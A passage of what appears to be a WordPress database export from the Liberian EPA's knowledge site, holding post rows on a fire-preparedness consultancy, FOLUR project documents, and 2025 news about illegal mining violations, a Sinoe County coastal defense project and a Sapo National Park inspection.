href=\"https://ekmsliberia.info/contribute/\">Join here!</a>This SiteContact		\n					<ul>\n							<li>\n										Address:<br>4th Street, Sinkor\n									</li>\n								<li>\n											<a href=\"mailto:contact@ekmsliberia.info\">\n										Email:<br>contact@ekmsliberia.info\n											</a>\n									</li>\n								<li>\n										Telephone:<br>\n									</li>\n						</ul>\n													<a href=\"https://www.thegef.org\" target=\"_blank\" rel=\"noopener\">\n							<img width=\"600\" height=\"600\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/gef_logo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://i0.wp.com/ekmsliberia.info/wp-content/uploads/2019/11/gef_logo.png?w=600&amp;ssl=1 600w, https://i0.wp.com/ekmsliberia.info/wp-content/uploads/2019/11/gef_logo.png?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/ekmsliberia.info/wp-content/uploads/2019/11/gef_logo.png?resize=150%2C150&amp;ssl=1 150w\" sizes=\"(max-width: 600px) 100vw, 600px\" />								</a>\n		This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.Follow us		\n					<a href=\"https://www.facebook.com/ekms.lib.7\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://twitter.com/EkmsLiberia\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.instagram.com/ekmsliberia/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n		This is an Official Web Platform of the Liberian Government.','Site-footer','','inherit','closed','closed','','3805-revision-v1','','','2023-06-16 12:00:47','2023-06-16 12:00:47','',3805,'https://ekmsliberia.info/?p=5367',0,'revision','',0),(5370,42,'2023-08-14 11:08:04','2023-08-14 11:08:04','','National Fire Preparedness & Response Plan ToR','','inherit','open','closed','','national-fire-preparedness-response-plan-tor','','','2023-08-14 11:08:04','2023-08-14 11:08:04','',0,'https://ekmsliberia.info/wp-content/uploads/2023/08/National-Fire-Preparedness-Response-Plan-ToR.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5371,42,'2023-08-14 11:13:46','2023-08-14 11:13:46','The Environmental Protection Agency (EPA) is the principal authority in Liberia responsible for the management of the environment; coordinate, monitor, supervise and consult with relevant stakeholders on all activities in the protection of the environment and sustainable use of natural resources.\r\n\r\nThe Environmental Protection Agency (EPA) through the United Nations Development Program (UNDP) Energy &amp; Environment Program/Country Program Support intents to support the Government of Liberia through the Environmental Protection Agency (EPA) to develop, validate and print a National Fire Preparedness and Response Plan.\r\n\r\nUNDP works to empower the population and build a resilient nation. It supports the government to develop and implement interventions aimed at improving the lives of the people, including women, youth and People with Disabilities (PWD). Through its Energy and Environment (E&amp;E) Programme, UNDP supports the government through its relevant Ministries, Agencies and Commissions (MACs) to address environmental issues and mitigate their impacts to support the collective growth and development of the Country.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2023/08/National-Fire-Preparedness-Response-Plan-ToR.docx\" target=\"_blank\" rel=\"noopener\">Consultant Wanted</a> </strong></em>','Call for Expression of Interest: Consultancy to Develop a National Fire Preparedness and Response Plan','','publish','closed','closed','','call-for-expression-of-interest-consultancy-to-develop-a-national-fire-preparedness-and-response-plan','','','2023-08-14 11:13:46','2023-08-14 11:13:46','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5371',59,'ekms_bulletin','',0),(5372,42,'2023-08-14 11:13:46','2023-08-14 11:13:46','The Environmental Protection Agency (EPA) is the principal authority in Liberia responsible for the management of the environment; coordinate, monitor, supervise and consult with relevant stakeholders on all activities in the protection of the environment and sustainable use of natural resources.\r\n\r\nThe Environmental Protection Agency (EPA) through the United Nations Development Program (UNDP) Energy &amp; Environment Program/Country Program Support intents to support the Government of Liberia through the Environmental Protection Agency (EPA) to develop, validate and print a National Fire Preparedness and Response Plan.\r\n\r\nUNDP works to empower the population and build a resilient nation. It supports the government to develop and implement interventions aimed at improving the lives of the people, including women, youth and People with Disabilities (PWD). Through its Energy and Environment (E&amp;E) Programme, UNDP supports the government through its relevant Ministries, Agencies and Commissions (MACs) to address environmental issues and mitigate their impacts to support the collective growth and development of the Country.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2023/08/National-Fire-Preparedness-Response-Plan-ToR.docx\" target=\"_blank\" rel=\"noopener\">Consultant Wanted</a> </strong></em>','Call for Expression of Interest: Consultancy to Develop a National Fire Preparedness and Response Plan','','inherit','closed','closed','','5371-revision-v1','','','2023-08-14 11:13:46','2023-08-14 11:13:46','',5371,'https://ekmsliberia.info/?p=5372',0,'revision','',0),(5374,42,'2023-09-13 21:39:25','2023-09-13 21:39:25','To promote biodiversity conservation and sustainable food systems for enhanced livelihood opportunities in NW Liberia Landscape through land use planning, restoration of degraded lands, and strengthening governance, policies, and market incentives for nationally replicable models of deforestation-free cocoa and palm oil value chains.','GEF FOLUR Liberia Project Implementation Progress Updates','','publish','closed','closed','','gef-folur-liberia-project-implementation-progress-updates','','','2023-09-13 21:39:25','2023-09-13 21:39:25','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5374',21,'document','',0),(5375,42,'2023-09-13 21:35:50','2023-09-13 21:35:50','','Post_Final_13SEPT23','','inherit','open','closed','','post_final_13sept23','','','2023-09-13 21:39:26','2023-09-13 21:39:26','',5374,'https://ekmsliberia.info/wp-content/uploads/2023/09/Post_Final_13SEPT23.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5376,42,'2023-09-13 21:39:10','2023-09-13 21:39:10','','Cacao ripen on a farm near Kyekyewere. 403VS3191','Cacao ripen on a farm near Kyekyewere. 403VS3191','inherit','open','closed','','cacao-ripen-on-a-farm-near-kyekyewere-403vs3191','','','2023-09-13 21:39:10','2023-09-13 21:39:10','',5374,'https://ekmsliberia.info/wp-content/uploads/2023/09/ci_99650429_Full-Copy.jpg',0,'attachment','image/jpeg',0),(5377,42,'2023-09-13 21:39:25','2023-09-13 21:39:25','To promote biodiversity conservation and sustainable food systems for enhanced livelihood opportunities in NW Liberia Landscape through land use planning, restoration of degraded lands, and strengthening governance, policies, and market incentives for nationally replicable models of deforestation-free cocoa and palm oil value chains.','GEF FOLUR Liberia Project Implementation Progress Updates','','inherit','closed','closed','','5374-revision-v1','','','2023-09-13 21:39:25','2023-09-13 21:39:25','',5374,'https://ekmsliberia.info/?p=5377',0,'revision','',0),(5378,42,'2023-09-14 19:40:36','2023-09-14 19:40:36','FOLUR Project summary','FOLUR Project Summary','','publish','closed','closed','','folur-project-summary','','','2023-09-14 19:40:36','2023-09-14 19:40:36','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5378',20,'document','',0),(5379,42,'2023-09-14 19:38:15','2023-09-14 19:38:15','','Copy of GEF FOLUR Project _Summary','','inherit','open','closed','','copy-of-gef-folur-project-_summary','','','2023-09-14 19:40:36','2023-09-14 19:40:36','',5378,'https://ekmsliberia.info/wp-content/uploads/2023/09/Copy-of-GEF-FOLUR-Project-_Summary.pdf',0,'attachment','application/pdf',0),(5380,42,'2023-09-14 19:38:19','2023-09-14 19:38:19','','FOLUR project Grievance Redress Mechanism_05SEPT23','','inherit','open','closed','','folur-project-grievance-redress-mechanism_05sept23','','','2023-09-14 19:45:10','2023-09-14 19:45:10','',5383,'https://ekmsliberia.info/wp-content/uploads/2023/09/FOLUR-project-Grievance-Redress-Mechanism_05SEPT23.pdf',0,'attachment','application/pdf',0),(5381,42,'2023-09-14 19:39:21','2023-09-14 19:39:21','','Screenshot 2023-09-14 at 19-24-30 EKMS CloudDrive','','inherit','open','closed','','screenshot-2023-09-14-at-19-24-30-ekms-clouddrive','','','2023-09-14 19:40:36','2023-09-14 19:40:36','',5378,'https://ekmsliberia.info/wp-content/uploads/2023/09/Screenshot-2023-09-14-at-19-24-30-EKMS-CloudDrive.png',0,'attachment','image/png',0),(5382,42,'2023-09-14 19:40:36','2023-09-14 19:40:36','FOLUR Project summary','FOLUR Project Summary','','inherit','closed','closed','','5378-revision-v1','','','2023-09-14 19:40:36','2023-09-14 19:40:36','',5378,'https://ekmsliberia.info/?p=5382',0,'revision','',0),(5383,42,'2023-09-14 19:45:10','2023-09-14 19:45:10','Grievance Redress Mechanism Summary','FOLUR Project Grievance Redress Mechanism','','publish','closed','closed','','folur-project-grievance-redress-mechanism','','','2023-09-14 19:45:10','2023-09-14 19:45:10','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5383',19,'document','',0),(5384,42,'2023-09-14 19:45:10','2023-09-14 19:45:10','Grievance Redress Mechanism Summary','FOLUR Project Grievance Redress Mechanism','','inherit','closed','closed','','5383-revision-v1','','','2023-09-14 19:45:10','2023-09-14 19:45:10','',5383,'https://ekmsliberia.info/?p=5384',0,'revision','',0),(5397,38,'2025-05-08 04:41:13','2025-05-08 04:41:13','<!-- wp:paragraph -->\n<p>May 7, 2025– The Environmental Protection Agency of Liberia has begun releasing early findings from its ongoing Nationwide Environmental Compliance Monitoring and County Tour, revealing a disturbing pattern of illegal mining and environmental damage in several parts of the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a preliminary report dated May 6, 2025, the EPA Situation Room outlined serious violations by Class B mining operators in Grand Kru, Lofa, and Rivercess Counties. These violations include mining without valid environmental permits, the illegal use of heavy equipment, deforestation, river diversion, and the pollution of water bodies used by local communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In Grand Kru County, the EPA field team reported major violations involving five companies. Scottment Investment Mining is operating in Philadelphia with excavators and has previously been fined by the EPA for similar violations in Gbarpolu County. MK Group is operating in Gbaken Town without an EPA permit and is reportedly polluting Dugbo Creek. Baby Girl Creek Mining in Dwehken is also unpermitted and is causing significant environmental degradation. GMGC Mining is running a large mining camp with no permit and clear signs of land and water pollution. Alex Fannoh Class B Mining in Mary Village is carrying out mining activities without any authorization from the EPA, adding to the list of unregulated operations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In Lofa County, the Saur Mining Company was caught operating in Kilu Town, Zorzor District, without an environmental permit. An unidentified Chinese Class B company was also discovered conducting operations in Lesco Town with no verified permit status, raising further concern about foreign involvement in illegal mining.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Rivercess County has reported some of the most severe cases of environmental destruction. African Commodity Inc. and Plam Group of Companies were both found mining without permits and failing to comply with national environmental standards. Kplon Mining and Agriculture Cooperative in Sand Beach has diverted a river channel without EPA approval, causing serious land and water disturbance. Water samples collected from affected areas in Rivercess will undergo laboratory testing to determine the level of pollution and assess any health risks to nearby residents.</p>\n<!-- /wp:paragraph -->','EPA Uncovers Widespread Environmental Violations in Grand Kru, Lofa, and Rivercess Counties','','publish','open','open','','epa-uncovers-widespread-environmental-violations-in-grand-kru-lofa-and-rivercess-counties','','','2025-05-08 04:41:16','2025-05-08 04:41:16','',0,'https://ekmsliberia.info/?p=5397',71,'post','',0),(5398,38,'2025-05-08 04:40:16','2025-05-08 04:40:16','','495335766_1161522499350341_7351978006935386528_n','','inherit','open','closed','','495335766_1161522499350341_7351978006935386528_n','','','2025-05-08 04:40:16','2025-05-08 04:40:16','',5397,'https://ekmsliberia.info/wp-content/uploads/2025/05/495335766_1161522499350341_7351978006935386528_n.jpg',0,'attachment','image/jpeg',0),(5399,38,'2025-05-08 04:41:13','2025-05-08 04:41:13','<!-- wp:paragraph -->\n<p>May 7, 2025– The Environmental Protection Agency of Liberia has begun releasing early findings from its ongoing Nationwide Environmental Compliance Monitoring and County Tour, revealing a disturbing pattern of illegal mining and environmental damage in several parts of the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a preliminary report dated May 6, 2025, the EPA Situation Room outlined serious violations by Class B mining operators in Grand Kru, Lofa, and Rivercess Counties. These violations include mining without valid environmental permits, the illegal use of heavy equipment, deforestation, river diversion, and the pollution of water bodies used by local communities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In Grand Kru County, the EPA field team reported major violations involving five companies. Scottment Investment Mining is operating in Philadelphia with excavators and has previously been fined by the EPA for similar violations in Gbarpolu County. MK Group is operating in Gbaken Town without an EPA permit and is reportedly polluting Dugbo Creek. Baby Girl Creek Mining in Dwehken is also unpermitted and is causing significant environmental degradation. GMGC Mining is running a large mining camp with no permit and clear signs of land and water pollution. Alex Fannoh Class B Mining in Mary Village is carrying out mining activities without any authorization from the EPA, adding to the list of unregulated operations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In Lofa County, the Saur Mining Company was caught operating in Kilu Town, Zorzor District, without an environmental permit. An unidentified Chinese Class B company was also discovered conducting operations in Lesco Town with no verified permit status, raising further concern about foreign involvement in illegal mining.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Rivercess County has reported some of the most severe cases of environmental destruction. African Commodity Inc. and Plam Group of Companies were both found mining without permits and failing to comply with national environmental standards. Kplon Mining and Agriculture Cooperative in Sand Beach has diverted a river channel without EPA approval, causing serious land and water disturbance. Water samples collected from affected areas in Rivercess will undergo laboratory testing to determine the level of pollution and assess any health risks to nearby residents.</p>\n<!-- /wp:paragraph -->','EPA Uncovers Widespread Environmental Violations in Grand Kru, Lofa, and Rivercess Counties','','inherit','closed','closed','','5397-revision-v1','','','2025-05-08 04:41:13','2025-05-08 04:41:13','',5397,'https://ekmsliberia.info/?p=5399',0,'revision','',0),(5400,38,'2025-05-08 04:47:36','2025-05-08 04:47:36','<!-- wp:paragraph -->\n<p>Led by Mr. Targen Daye, Assistant Director for Environmental and Social Impact Assessment (ESIA) is in Grand Kru engaging with various stakeholders and company owners.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The team recently met with Scott Investment Company, owned by Mr. Rondy Scott, which has relocated to Grand Kru after being previously fined by the EPA while operating in Gbarpolu.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a></a>Unfortunately, it was discovered that Scott Investment is currently operating without an environmental permit, resulting in significant land degradation and pollution in the area.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The team also identified MK Group, another Class B mining company, which is operating without the necessary permit and is causing serious environmental harm along Dugbo Creek in Gbakan Town.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Additionally, Baby Girl Creek Mining, owned by Joice Bargor in Dwehken, is also running without an environmental permit, much like GMGC Mining Company, which has a large operational camp and is similarly without proper permissions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We remain committed to holding companies accountable and protecting our environment!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Stay tuned as we bring you more update!!!</p>\n<!-- /wp:paragraph -->','Update from Grand Kru!','','publish','open','open','','update-from-grand-kru','','','2025-05-08 04:47:38','2025-05-08 04:47:38','',0,'https://ekmsliberia.info/?p=5400',70,'post','',0),(5401,38,'2025-05-08 04:47:19','2025-05-08 04:47:19','','EPA1','','inherit','open','closed','','epa1','','','2025-05-08 04:47:19','2025-05-08 04:47:19','',5400,'https://ekmsliberia.info/wp-content/uploads/2025/05/EPA1.jpg',0,'attachment','image/jpeg',0),(5402,38,'2025-05-08 04:47:36','2025-05-08 04:47:36','<!-- wp:paragraph -->\n<p>Led by Mr. Targen Daye, Assistant Director for Environmental and Social Impact Assessment (ESIA) is in Grand Kru engaging with various stakeholders and company owners.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The team recently met with Scott Investment Company, owned by Mr. Rondy Scott, which has relocated to Grand Kru after being previously fined by the EPA while operating in Gbarpolu.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a></a>Unfortunately, it was discovered that Scott Investment is currently operating without an environmental permit, resulting in significant land degradation and pollution in the area.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The team also identified MK Group, another Class B mining company, which is operating without the necessary permit and is causing serious environmental harm along Dugbo Creek in Gbakan Town.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Additionally, Baby Girl Creek Mining, owned by Joice Bargor in Dwehken, is also running without an environmental permit, much like GMGC Mining Company, which has a large operational camp and is similarly without proper permissions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We remain committed to holding companies accountable and protecting our environment!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Stay tuned as we bring you more update!!!</p>\n<!-- /wp:paragraph -->','Update from Grand Kru!','','inherit','closed','closed','','5400-revision-v1','','','2025-05-08 04:47:36','2025-05-08 04:47:36','',5400,'https://ekmsliberia.info/?p=5402',0,'revision','',0),(5403,38,'2025-05-08 17:07:44','0000-00-00 00:00:00','<!-- wp:paragraph -->\n<p>(Grand Gedeh, May 8, 2025) – The Environmental Protection Agency of Liberia has uncovered serious environmental violations in Grand Gedeh County during a monitoring visit. The visit is part of the EPA\'s ongoing Nationwide County Tour and Monitoring Mission aimed at ensuring compliance with environmental laws across the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The team found a sharp increase in both small and semi-industrial mining across the county, especially in the Glio-Twabo and Billibo electoral districts. In the Glio-Twabo area, the team found many Class B and Class C mining sites operating without regard to environmental laws. Class C miners were even using excavators, which is against the rules.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In Billibo District #2, two active Class B mining sites operated by Scott Investment were found breaking major environmental rules. In Billibo Town, land degradation stretched over 500 meters, forcing the EPA to issue an immediate Halt Order and seize a power generator key. The second site, located at U-Way and Dehjillah, can only be reached by canoe. There, the team saw a Chinese company building a bridge over the Dugbeh River to access the mining site.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA also inspected the forestry sector and found several problems. Euro Logging, though licensed, was blocking inspections, not reporting activities, and poorly managing waste. In Boundary Town, Horizon Logging had shut down operations since 2023, leaving behind scattered logs and abandoned equipment with court orders attached.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The agricultural sector was not left out. Patarah Farm in Jaibo is growing cocoa on 600 acres without an environmental permit. Workers admitted using agrochemicals from nearby markets and Ivory Coast without understanding how to handle them safely.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Sustainable Agriculture Production (SAP) project, between Solo Town and Tuzon Junction, targets communities affected by the Krahn-Grebo National Park. Though the project aims to help locals by promoting cocoa, cassava, and rice farming, the EPA did not confirm full environmental compliance.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Photos from the trip show the damage done, especially in Scott Investment B’s mining area in Billibo, where the EPA issued its first Halt Order due to massive land damage. Other images show EPA teams crossing rivers and testing water quality.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA says it will continue these monitoring visits across the country as part of its Nationwide Tour to make sure businesses follow the Environmental Protection and Management Law of Liberia.</p>\n<!-- /wp:paragraph -->','EPA Uncovers Massive Environmental Violations in Grand Gedeh County','','draft','open','open','','','','','2025-05-08 17:07:44','2025-05-08 17:07:44','',0,'https://ekmsliberia.info/?p=5403',69,'post','',0),(5406,38,'2025-05-12 15:21:29','2025-05-12 15:21:29','<!-- wp:paragraph -->\n<p>(Monrovia, Liberia – May 12, 2025)-The Government of Liberia, through the Environmental Protection Agency (EPA), will officially launch the Sinoe County Coastal Defense Project on Tuesday, May 13, 2025, in a bold move to curb the worsening impact of sea erosion on Greenville City.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The disclosure was made Monday morning by EPA Executive Director Dr. Emmanuel K. Urey Yarkpawolo during a telephone interview on OK FM’s “OK Morning Rush.” Dr. Yarkpawolo described the situation in Greenville as “devastating,” prompting immediate government intervention through the EPA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The City of Greenville is being washed away gradually,” he said. “This project is a direct response to protect lives, properties, and critical infrastructure in the area.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo revealed that the coastal defense project is valued at $20 million USD, co-funded by the Global Environment Facility (GEF), the United Nations Development Programme (UNDP), and the Government of Liberia. He said the Liberian government, through the EPA, is contributing $11 million, primarily through in-kind resources such as rock materials to be used for the construction of coastal barriers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that the defense structure will utilize an advanced coastal engineering method known as a coastal revetment, involving strategically placed rocks and a sophisticated breakwater system built deep into the water. “This system reduces the energy of the waves before they hit the shore,” Dr.Yarkpawolo said. “When the tide comes in, it will be weaker when it reaches land, preventing further erosion.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Sinoe County initiative forms part of a broader intervention under the Integrated Coastal Management Project targeting all nine coastal counties of Liberia. The three main components of the intervention include:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>Integrated Coastal Zone Management</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Livelihood Initiatives, particularly support to local agriculture</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>The Coastal Defense Structure, which is the centerpiece of the current Sinoe County effort</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Greenville City, the capital of Sinoe County, has long suffered from coastal erosion due to rising sea levels and poor shoreline resilience. In recent years, entire stretches of beach have been consumed by the sea, with some homes and businesses losing ground to tidal waves. Locals report that rainfall and aggressive wave actions during the rainy season often lead to flooding, displacement, and destruction of public facilities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The problem is not unique to Sinoe. Coastal communities across Liberia—from New Kru Town in Montserrado to Robertsport in Grand Cape Mount—have also experienced varying degrees of sea intrusion, prompting calls for sustained government action.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>With the launch of the Sinoe County Coastal Defense Project, the Government of Liberia through the EPA is offering a glimmer of hope to residents of Greenville. “This is not just about rocks and water,” Dr. Yarkpawolo emphasized. “It’s about saving our coastal cities and securing the future for generations to come.”</p>\n<!-- /wp:paragraph -->','GoL to Launch $20 Million Coastal Defense Project in Sinoe County Amid Alarming Sea Erosion','','publish','open','open','','gol-to-launch-20-million-coastal-defense-project-in-sinoe-county-amid-alarming-sea-erosion','','','2025-05-12 15:21:32','2025-05-12 15:21:32','',0,'https://ekmsliberia.info/?p=5406',68,'post','',0),(5407,38,'2025-05-12 15:21:12','2025-05-12 15:21:12','','05f0f762-a84b-4de2-96ed-3ca8dc13b14c','','inherit','open','closed','','05f0f762-a84b-4de2-96ed-3ca8dc13b14c','','','2025-05-12 15:21:12','2025-05-12 15:21:12','',5406,'https://ekmsliberia.info/wp-content/uploads/2025/05/05f0f762-a84b-4de2-96ed-3ca8dc13b14c.jpeg',0,'attachment','image/jpeg',0),(5408,38,'2025-05-12 15:21:29','2025-05-12 15:21:29','<!-- wp:paragraph -->\n<p>(Monrovia, Liberia – May 12, 2025)-The Government of Liberia, through the Environmental Protection Agency (EPA), will officially launch the Sinoe County Coastal Defense Project on Tuesday, May 13, 2025, in a bold move to curb the worsening impact of sea erosion on Greenville City.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The disclosure was made Monday morning by EPA Executive Director Dr. Emmanuel K. Urey Yarkpawolo during a telephone interview on OK FM’s “OK Morning Rush.” Dr. Yarkpawolo described the situation in Greenville as “devastating,” prompting immediate government intervention through the EPA.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The City of Greenville is being washed away gradually,” he said. “This project is a direct response to protect lives, properties, and critical infrastructure in the area.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo revealed that the coastal defense project is valued at $20 million USD, co-funded by the Global Environment Facility (GEF), the United Nations Development Programme (UNDP), and the Government of Liberia. He said the Liberian government, through the EPA, is contributing $11 million, primarily through in-kind resources such as rock materials to be used for the construction of coastal barriers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that the defense structure will utilize an advanced coastal engineering method known as a coastal revetment, involving strategically placed rocks and a sophisticated breakwater system built deep into the water. “This system reduces the energy of the waves before they hit the shore,” Dr.Yarkpawolo said. “When the tide comes in, it will be weaker when it reaches land, preventing further erosion.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Sinoe County initiative forms part of a broader intervention under the Integrated Coastal Management Project targeting all nine coastal counties of Liberia. The three main components of the intervention include:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>Integrated Coastal Zone Management</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Livelihood Initiatives, particularly support to local agriculture</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>The Coastal Defense Structure, which is the centerpiece of the current Sinoe County effort</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Greenville City, the capital of Sinoe County, has long suffered from coastal erosion due to rising sea levels and poor shoreline resilience. In recent years, entire stretches of beach have been consumed by the sea, with some homes and businesses losing ground to tidal waves. Locals report that rainfall and aggressive wave actions during the rainy season often lead to flooding, displacement, and destruction of public facilities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The problem is not unique to Sinoe. Coastal communities across Liberia—from New Kru Town in Montserrado to Robertsport in Grand Cape Mount—have also experienced varying degrees of sea intrusion, prompting calls for sustained government action.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>With the launch of the Sinoe County Coastal Defense Project, the Government of Liberia through the EPA is offering a glimmer of hope to residents of Greenville. “This is not just about rocks and water,” Dr. Yarkpawolo emphasized. “It’s about saving our coastal cities and securing the future for generations to come.”</p>\n<!-- /wp:paragraph -->','GoL to Launch $20 Million Coastal Defense Project in Sinoe County Amid Alarming Sea Erosion','','inherit','closed','closed','','5406-revision-v1','','','2025-05-12 15:21:29','2025-05-12 15:21:29','',5406,'https://ekmsliberia.info/?p=5408',0,'revision','',0),(5409,38,'2025-05-12 15:40:39','2025-05-12 15:40:39','<!-- wp:paragraph -->\n<p>(Greenville, Sinoe County – May 10, 2025 )— As part of efforts to strengthen environmental protection and regulation across Liberia, the Executive Director of the Environmental Protection Agency (EPA), Dr. Emmanuel Urey Yarkpawolo and his team, on Saturday, May 10, 2025, continued his southeastern tour with a visit to the Forestry Development Authority (FDA) office in Greenville, Sinoe County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>While in Greenville, Dr. Yarkpawolo held a strategic engagement with FDA employees and park rangers, encouraging them to work collaboratively with the EPA and other relevant government agencies. He stressed that such partnerships are essential to achieving national goals for environmental sustainability.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the discussion, the rangers shared their experiences dealing with illegal activities in the Sapo National Park, including illicit mining and hunting. They highlighted land degradation, water pollution, and the widespread threat of illegal mining as key environmental challenges endangering the park’s ecosystem.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In response to these alarming reports, Dr. Yarkpawolo extended his visit to the Sapo National Park for a fact-finding mission. Upon arrival, he met with the park\'s chief warden, John G. Smith, who provided detailed insights into the state of the park and the difficulties faced in protecting it.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In his commitment to transparency and evidence-based action, the EPA Executive Director proceeded with a team of FDA rangers to the Sapo Eco Lodge — an establishment operating near the park and often frequented by tourists.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, Dr. Yarkpawolo made a concerning observation: tourists were being transported to the park via canoe without life jackets, posing a serious safety risk. Further investigation revealed that the Sapo Eco Lodge had been operating without an environmental permit — a clear violation of national environmental laws.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA Executive Director promptly informed the management of the lodge to begin the environmental permitting process without delay. He warned that failure to comply would result in penalties, including possible suspension or shutdown of operations.</p>\n<!-- /wp:paragraph -->','EPA Executive Director and Team Tours Sapo National Park, Cautions Eco Lodge on Permit Violation','','publish','open','open','','epa-executive-director-and-team-tours-sapo-national-park-cautions-eco-lodge-on-permit-violation','','','2025-05-12 15:40:42','2025-05-12 15:40:42','',0,'https://ekmsliberia.info/?p=5409',67,'post','',0),(5410,38,'2025-05-12 15:38:38','2025-05-12 15:38:38','','c9edcf88-97e7-4639-bc3c-a0b5b75e3d4e','','inherit','open','closed','','c9edcf88-97e7-4639-bc3c-a0b5b75e3d4e','','','2025-05-12 15:38:38','2025-05-12 15:38:38','',5409,'https://ekmsliberia.info/wp-content/uploads/2025/05/c9edcf88-97e7-4639-bc3c-a0b5b75e3d4e.jpeg',0,'attachment','image/jpeg',0),(5411,38,'2025-05-12 15:40:39','2025-05-12 15:40:39','<!-- wp:paragraph -->\n<p>(Greenville, Sinoe County – May 10, 2025 )— As part of efforts to strengthen environmental protection and regulation across Liberia, the Executive Director of the Environmental Protection Agency (EPA), Dr. Emmanuel Urey Yarkpawolo and his team, on Saturday, May 10, 2025, continued his southeastern tour with a visit to the Forestry Development Authority (FDA) office in Greenville, Sinoe County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>While in Greenville, Dr. 